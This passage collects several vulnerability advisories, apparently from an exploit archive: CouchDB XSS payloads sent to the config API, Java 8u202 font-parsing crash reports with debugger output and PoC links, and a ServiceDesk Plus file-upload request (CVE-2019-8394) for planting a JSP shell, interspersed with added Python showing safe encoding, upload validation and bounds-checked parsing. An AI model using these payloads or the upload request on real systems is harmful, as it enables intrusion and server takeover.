http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Put
PAYLOAD
<img src=x onerror=alert(2)>
<input class="input-option-name" type="text" name="name" placeholder="Name">
#################################################################################
XSS3 | DOM Based & Stored - Delete Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Delete
PAYLOAD
<img src=x onerror=alert(2)>
#################################################################################
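The ArangoDB cases above show the search term landing inside a value="..." attribute, where a leading "> closes the attribute and the tag, and the CouchDB cases show a name containing an img tag being placed into the page. Added here as an illustration that is not part of either advisory or product: the unsafe way of building that markup beside a version that encodes for the HTML context, with a small parser-based inspector that reports which tags a browser-like parser would create. The search template reuses the element id and classes quoted above; the list-item template for the text context and the function names are assumptions.

```python
import html
from html.parser import HTMLParser

# Attribute-context template mirroring the markup quoted above.
SEARCH_TEMPLATE = ('<div class="search-field"><input type="text" value="%s" id="%s" '
                   'class="search-input" placeholder="Search..."/></div>')
# Assumed text-context template, e.g. a name shown in a list.
ITEM_TEMPLATE = '<li class="db-name">%s</li>'


def attr_encode(value):
    # One encoder for both contexts: &, <, >, " and ' become entities, so the
    # value can neither close a quoted attribute nor open a tag.
    return html.escape(value, quote=True)


def render_search_unsafe(term, input_id="viewsSearchInput"):
    # The vulnerable form: raw string concatenation into the attribute.
    return SEARCH_TEMPLATE % (term, input_id)


def render_search_safe(term, input_id="viewsSearchInput"):
    return SEARCH_TEMPLATE % (attr_encode(term), input_id)


def render_item_unsafe(name):
    return ITEM_TEMPLATE % name


def render_item_safe(name):
    return ITEM_TEMPLATE % attr_encode(name)


class _Inspector(HTMLParser):
    """Records which tags a browser-like parser creates and what value the
    <input> element actually carries after entity decoding."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def inspect(markup):
    """Return (list of tags created, decoded value of the <input>, if any)."""
    parser = _Inspector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_value


if __name__ == "__main__":
    attr_payload = '"><script>alert(1)</script>'   # shape from the ArangoDB cases
    text_payload = "<img src=x onerror=alert(1)>"    # shape from the CouchDB cases
    print(inspect(render_search_unsafe(attr_payload)))   # (['div', 'input', 'script'], '')
    print(inspect(render_search_safe(attr_payload)))     # (['div', 'input'], '"><script>alert(1)</script>')
    print(inspect(render_item_unsafe(text_payload))[0])  # ['li', 'img']
    print(inspect(render_item_safe(text_payload))[0])    # ['li']
```

The safe search render keeps the user's term intact as data (the inspector decodes it back unchanged) while the parser sees exactly the two elements the template contains; that is the property to test for, rather than the absence of a particular payload string. Note that a quoted attribute already contains an img tag harmlessly, which is why the CouchDB case only fires where the name is later written into element content or via innerHTML; encoding per output context covers both.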
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of OpenType fonts. It manifests itself in the form of the following crash (with AFL's libdislocator):
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x6d1a
RBX: 0x7fffb5d94f48 --> 0x7fffb6319f00 --> 0x53ab1500ff
RCX: 0xffffffffffff0000
RDX: 0x7fff28fbdfe6 --> 0x2a001d00100003
RSI: 0x7fff28fadfe8 --> 0x1e001100040000
[...]
[-------------------------------------code-------------------------------------]
0x7fffb6395564 <glyph_CloseContour+148>: mov rsi,QWORD PTR [rbx+0x20]
0x7fffb6395568 <glyph_CloseContour+152>: add rcx,rcx
0x7fffb639556b <glyph_CloseContour+155>: lea rdi,[rdx+rcx*1-0x2]
=> 0x7fffb6395570 <glyph_CloseContour+160>: movsx rsi,WORD PTR [rsi+rcx*1-0x2]
0x7fffb6395576 <glyph_CloseContour+166>: mov rdx,QWORD PTR [rbx+0x30]
0x7fffb639557a <glyph_CloseContour+170>: movsx rcx,WORD PTR [rdi]
0x7fffb639557e <glyph_CloseContour+174>: movzx r8d,WORD PTR [rdx+rcx*2]
0x7fffb6395583 <glyph_CloseContour+179>: cmp WORD PTR [rdx+rsi*2],r8w
[...]
Stopped reason: SIGSEGV
0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
gdb-peda$ where
#0 0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
#1 0x00007fffb63ad71c in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#2 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#3 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#4 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#5 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#6 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#7 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#8 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#9 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#10 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#11 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#12 0x00007fffb63b469c in tsi_T2GetGlyphByIndex () from jre/8u202/lib/amd64/libt2k.so
#13 0x00007fffb63b5655 in tsi_NewCFFClass () from jre/8u202/lib/amd64/libt2k.so
#14 0x00007fffb63c73c8 in New_sfntClassLogical () from jre/8u202/lib/amd64/libt2k.so
#15 0x00007fffb63a43e3 in Java_sun_font_T2KFontScaler_initNativeScaler () from jre/8u202/lib/amd64/libt2k.so
#16 0x00007fffe5e376c7 in ?? ()
#17 0x00007fff0003ccc0 in ?? ()
#18 0x0000000000000000 in ?? ()
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash can be observed with PageHeap enabled for the java.exe process:
--- cut ---
(5f34.5d1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k+0xfbec:
00007ffa`0b4cfbec 4e0fbf4c50fe movsx r9,word ptr [rax+r10*2-2] ds:00000000`39c44ffe=????
0:004> k
# Child-SP RetAddr Call Site
00 00000000`0d82de70 00007ffa`0b4e0c0d t2k+0xfbec
01 00000000`0d82dea0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x5305
02 00000000`0d82df20 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
03 00000000`0d82dfa0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
04 00000000`0d82e020 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
05 00000000`0d82e0a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
06 00000000`0d82e120 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
07 00000000`0d82e1a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
08 00000000`0d82e220 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
09 00000000`0d82e2a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0a 00000000`0d82e320 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0b 00000000`0d82e3a0 00007ffa`0b4e3dd1 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0c 00000000`0d82e420 00007ffa`0b4e4108 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x84c9
0d 00000000`0d82e460 00007ffa`0b4e47e4 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8800
0e 00000000`0d82e4b0 00007ffa`0b4f07c5 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8edc
0f 00000000`0d82e500 00007ffa`0b4f0b11 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x72c9
10 00000000`0d82e560 00007ffa`0b4d9ef6 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x7615
11 00000000`0d82e5e0 00000000`0f928d27 t2k!Java_sun_font_T2KFontScaler_initNativeScaler+0x2c2
12 00000000`0d82e650 00000000`2ad8f228 0xf928d27
13 00000000`0d82e658 00000000`b0063339 0x2ad8f228
14 00000000`0d82e660 00000000`0d82e730 0xb0063339
15 00000000`0d82e668 00000000`b006f271 0xd82e730
16 00000000`0d82e670 00000000`00000000 0xb006f271
0:004> ? rax
Evaluate expression: 969232384 = 00000000`39c55000
0:004> ? r10
Evaluate expression: -32768 = ffffffff`ffff8000
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading OpenType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46409.zip
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007fbaa11694c8, pid=19540, tid=0x00007fbac4f18700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x284c8] OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&)+0x268
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid19540.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the OpenTypeLayoutEngine::adjustGlyphPositions function attempts to access an invalid memory region:
--- cut ---
gdb-peda$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff0283cc0 --> 0x0
[...]
[-------------------------------------code-------------------------------------]
0x7fffc41cb4bb <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+603>: nop DWORD PTR [rax+rax*1+0x0]
0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>: lea rax,[rax+rax*4]
0x7fffc41cb4c4 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+612>: lea rax,[rdx+rax*4]
=> 0x7fffc41cb4c8 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+616>: addss xmm0,DWORD PTR [rax]
0x7fffc41cb4cc <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+620>: addss xmm1,DWORD PTR [rax+0x4]
0x7fffc41cb4d1 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+625>: movsxd rax,DWORD PTR [rax+0x10]
0x7fffc41cb4d5 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+629>: test eax,eax
0x7fffc41cb4d7 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+631>: jns 0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffc41cb4c8 in OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&) ()
from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(3798.db8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346:
00007ffa`0c9eb046 8b448a10 mov eax,dword ptr [rdx+rcx*4+10h] ds:00000000`69815274=????????
0:004> ? rdx
Evaluate expression: 1696397556 = 00000000`651cf8f4
0:004> ? rcx
Evaluate expression: 18421340 = 00000000`0119165c
0:004> k
# Child-SP RetAddr Call Site
00 00000000`055ce250 00007ffa`0c9e3c3f fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346
01 00000000`055ce3c0 00007ffa`0c9ef6fe fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0xbf3f
02 00000000`055ce420 00000000`056e8d27 fontmanager!Java_sun_font_SunLayoutEngine_nativeLayout+0x21e
03 00000000`055ce750 00000000`055ce750 0x56e8d27
04 00000000`055ce758 00000000`5cb9a4a8 0x55ce750
05 00000000`055ce760 00000000`055ce7c0 0x5cb9a4a8
06 00000000`055ce768 00000000`5cb3fd68 0x55ce7c0
07 00000000`055ce770 00000000`055ce8e8 0x5cb3fd68
08 00000000`055ce778 00000000`00000000 0x55ce8e8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46410.zip
# Exploit Title: Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 - arbitrary file upload
# Date: 18-02-2019
# Exploit Author: Dao Duy Hung (duyhungattt@gmail.com)
# Vendor Homepage: https://www.manageengine.com/products/service-desk/
# Software Link: https://www.manageengine.com/products/service-desk/download.html?opDownload_indexbnr
# Version: 9.4 and 10.0 before 10.0 build 10012
# Tested on: SDP 10.0 build 10000
# CVE : CVE-2019-8394
Detail:
In common/FileAttachment.jsp (line 332), the upload extension check is only applied when the 'module' parameter equals 'SSP', 'DashBoard' or 'HomePage'. If 'module' is set to 'CustomLogin', the extension check is skipped and an arbitrary file is written to the '/custom/login' folder, from where it can be accessed directly via 'host:port/custom/login/filename'. An authenticated user with minimal permissions (e.g. guest) can therefore upload a webshell to the server.
POST /common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1
Host: localhost:8080
Content-Length: 508
Accept: */*
Origin: http://localhost:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----aaa
Referer: http://localhost:8080/DashBoard.do
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; JSESSIONID=66716A38326AE43058F4A71FCF4E1E42; JSESSIONIDSSO=6970EB5659C20DFF0CF5015D9C91448E; sdpcsrfcookie=ec189770-d1aa-4db3-9a97-36f4ab3db380
Connection: close
------aaa
Content-Disposition: form-data; name="sspsetup"
Attach
------aaa
Content-Disposition: form-data; name="module"
CustomLogin
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.jsp"
Content-Type: text/html
This is shell content
------aaa
Content-Disposition: form-data; name="hmtlcontent"
------aaa--
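The defect described above is a validation step keyed on a client-controlled value: the extension allowlist only runs for some values of 'module', so any other value falls through to an unchecked write. As an added Python illustration (not the product's JSP code; the module names come from the advisory, the allowlist and file names are constructed), here is that decision logic beside a hardened version that validates every upload the same way and never uses the client's filename on disk:

```python
import os
import secrets

# Module values named in the advisory; the allowlist itself is constructed.
CHECKED_MODULES = {"SSP", "DashBoard", "HomePage"}
KNOWN_MODULES = CHECKED_MODULES | {"CustomLogin"}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "css"}


def extension_of(filename: str) -> str:
    """Last extension of the client-supplied name, lower-cased, ignoring any
    directory components (a browser or script may send a full path)."""
    base = os.path.basename(filename.replace("\\", "/"))
    _, dot, ext = base.rpartition(".")
    return ext.lower() if dot else ""


def vulnerable_accepts(module: str, filename: str) -> bool:
    """Before: the extension check only runs for three module values, so any
    other value ('CustomLogin' in the advisory) skips validation entirely."""
    if module in CHECKED_MODULES:
        return extension_of(filename) in ALLOWED_EXTENSIONS
    return True


def hardened_accepts(module: str, filename: str) -> bool:
    """After: the module only selects the destination folder; the content
    policy is applied to every upload, and unknown modules are rejected."""
    if module not in KNOWN_MODULES:
        return False
    if "\x00" in filename or not filename.strip():
        return False
    return extension_of(filename) in ALLOWED_EXTENSIONS


def storage_name(filename: str) -> str:
    """Server-generated name: the client influences the extension only through
    the allowlist, never the path or the basename that ends up on disk."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return f"{secrets.token_hex(8)}.{ext}"
```

The point of storage_name is that even a correct allowlist leaves the original filename as an input to the filesystem; generating the name server-side removes that input entirely.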
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f42e9a30f79, pid=43119, tid=0x00007f431d7fc700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x7f79] AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const+0xe9
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid43119.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the AlternateSubstitutionSubtable::process function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7ffff7fbbc34 --> 0x0
RCX: 0xfff6
RDX: 0x8066
[...]
R12: 0x7ffff0237946 --> 0x100f6ff26000100
[...]
[-------------------------------------code-------------------------------------]
0x7fffcc1aaf72 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+226>: movzx ecx,cx
0x7fffcc1aaf75 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+229>: cmp ecx,edx
0x7fffcc1aaf77 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+231>: jle 0x7fffcc1aaf3e <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+174>
=> 0x7fffcc1aaf79 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+233>: movzx eax,WORD PTR [r12+rdx*2+0x6]
0x7fffcc1aaf7f <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+239>: xor edx,edx
0x7fffcc1aaf81 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+241>: rol ax,0x8
0x7fffcc1aaf85 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+245>: movzx eax,ax
0x7fffcc1aaf88 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+248>: add r12,rax
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffcc1aaf79 in AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const () from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5ae8.5c58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager+0x11a9:
00007ffa`0d6211a9 0fb74c4306 movzx ecx,word ptr [rbx+rax*2+6] ds:00000000`4484a028=????
0:004> ? rbx
Evaluate expression: 1149476694 = 00000000`44839f56
0:004> ? rax
Evaluate expression: 32870 = 00000000`00008066
--- cut ---
Attached with this report is the mutated testcase, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46412.zip
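The disassembly in this report shows the shape of the bug: a 16-bit value taken from the font (rdx = 0x8066) passes a comparison against another font-supplied value (rcx = 0xfff6), is used to index an offset array at r12+rdx*2+6, and the fetched offset is added straight to the table base (add r12,rax); nothing along the way is compared against the real length of the table data. As an added illustration (not code from the report or from the JDK layout engine), here is a length-checked parser for a GSUB AlternateSubst format 1 subtable, written in Python from the OpenType specification's layout of that subtable. MalformedTable, build_table and MALFORMED_SAMPLE are constructed for the demonstration; the sample is not one of the report's testcases.

```python
import struct


class MalformedTable(ValueError):
    """A count or offset inside the subtable points outside its bytes."""


def _u16(buf: bytes, off: int) -> int:
    # Every field read goes through this bound check. The crash in the report
    # is what happens when index*2 or a fetched offset is added to the table
    # base without comparing it against the table length first.
    if off < 0 or off + 2 > len(buf):
        raise MalformedTable(f"u16 read at offset {off} exceeds {len(buf)}-byte table")
    return struct.unpack_from(">H", buf, off)[0]


def parse_alternate_subst(buf: bytes) -> dict:
    """Parse an OpenType GSUB AlternateSubst format 1 subtable.

    Layout (OpenType spec): substFormat u16, coverageOffset u16,
    alternateSetCount u16, alternateSetOffsets[alternateSetCount] u16;
    each AlternateSet is glyphCount u16 followed by glyphCount glyph ids.
    All offsets are relative to the start of the subtable.
    """
    if _u16(buf, 0) != 1:
        raise MalformedTable("only AlternateSubst format 1 is handled here")
    coverage_off = _u16(buf, 2)
    count = _u16(buf, 4)
    # Validate the declared count against the buffer before indexing the
    # offset array: a count such as 0xfff6 in a 20-byte table is rejected here.
    if 6 + 2 * count > len(buf):
        raise MalformedTable(f"alternateSetCount {count} does not fit in the table")
    if coverage_off >= len(buf):
        raise MalformedTable(f"coverage offset {coverage_off} outside the table")
    alternate_sets = []
    for i in range(count):
        set_off = _u16(buf, 6 + 2 * i)
        glyph_count = _u16(buf, set_off)  # bounds-checked read of the offset target
        if set_off + 2 + 2 * glyph_count > len(buf):
            raise MalformedTable(f"AlternateSet {i} overruns the table")
        alternate_sets.append(
            [_u16(buf, set_off + 2 + 2 * g) for g in range(glyph_count)]
        )
    return {"coverage_offset": coverage_off, "alternate_sets": alternate_sets}


def lookup_alternates(buf: bytes, coverage_index: int) -> list:
    """Return the alternate glyphs for a coverage index, refusing indices the
    subtable cannot back with real data (the declared count is not trusted)."""
    sets = parse_alternate_subst(buf)["alternate_sets"]
    if not 0 <= coverage_index < len(sets):
        raise MalformedTable(f"coverage index {coverage_index} has no AlternateSet")
    return sets[coverage_index]


def build_table(alternate_sets) -> bytes:
    """Construct a well-formed subtable for testing (not taken from any real font).
    A minimal CoverageFormat1 table is appended so the coverage offset is in range."""
    count = len(alternate_sets)
    header_len = 6 + 2 * count
    offsets, sets_blob = [], b""
    for glyphs in alternate_sets:
        offsets.append(header_len + len(sets_blob))
        sets_blob += struct.pack(">H", len(glyphs)) + b"".join(
            struct.pack(">H", g) for g in glyphs
        )
    coverage_off = header_len + len(sets_blob)
    coverage = struct.pack(">HH", 1, count) + b"".join(
        struct.pack(">H", g) for g in range(count)
    )
    header = struct.pack(">HHH", 1, coverage_off, count) + b"".join(
        struct.pack(">H", o) for o in offsets
    )
    return header + sets_blob + coverage


# Constructed malformed sample: a 20-byte subtable whose header claims
# 0xfff6 AlternateSets, mirroring the count value seen in the registers.
MALFORMED_SAMPLE = struct.pack(">HHH", 1, 6, 0xFFF6) + b"\x00" * 14
```

The two checks that matter are the ones the crashing code lacks: the declared array must fit inside the bytes actually present, and every offset pulled out of the file must be validated before it is dereferenced.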
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
Iteration (0,0)
Iteration (0,1)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f857116fde3, pid=31542, tid=0x00007f85a5a70700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libt2k.so+0x4cde3] ExtractBitMap_blocClass+0xcc3
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid31542.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the ExtractBitMap_blocClass function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x96e40 ('@n\t')
RBX: 0x100c4
RCX: 0x12dc8
RDX: 0x757969c4
RSI: 0x7ffff02f7238 --> 0x7840201008
[...]
[-------------------------------------code-------------------------------------]
0x7fffbf616ddb <ExtractBitMap_blocClass+3259>: mov ecx,eax
0x7fffbf616ddd <ExtractBitMap_blocClass+3261>: sar ecx,0x3
0x7fffbf616de0 <ExtractBitMap_blocClass+3264>: movsxd rcx,ecx
=> 0x7fffbf616de3 <ExtractBitMap_blocClass+3267>: movzx edi,BYTE PTR [rsi+rcx*1]
0x7fffbf616de7 <ExtractBitMap_blocClass+3271>: cmp edx,r8d
0x7fffbf616dea <ExtractBitMap_blocClass+3274>: jl 0x7fffbf616dd0 <ExtractBitMap_blocClass+3248>
0x7fffbf616dec <ExtractBitMap_blocClass+3276>: mov ecx,r11d
0x7fffbf616def <ExtractBitMap_blocClass+3279>: mov r13d,0x80
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffbf616de3 in ExtractBitMap_blocClass () from jre/8u202/lib/amd64/libt2k.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5218.154c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155:
00007ffa`0b8eb651 468a1c20 mov r11b,byte ptr [rax+r12] ds:00000000`64c09000=??
0:004> ? rax
Evaluate expression: 84720 = 00000000`00014af0
0:004> ? r12
Evaluate expression: 1690256656 = 00000000`64bf4510
0:004> k
# Child-SP RetAddr Call Site
00 00000000`04a8e9d0 00007ffa`0b8ebf92 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155
01 00000000`04a8eaa0 00007ffa`0b8e8e05 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2a96
02 00000000`04a8eb80 00007ffa`0b8e9011 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd4fd
03 00000000`04a8ebf0 00007ffa`0b8daeab t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd709
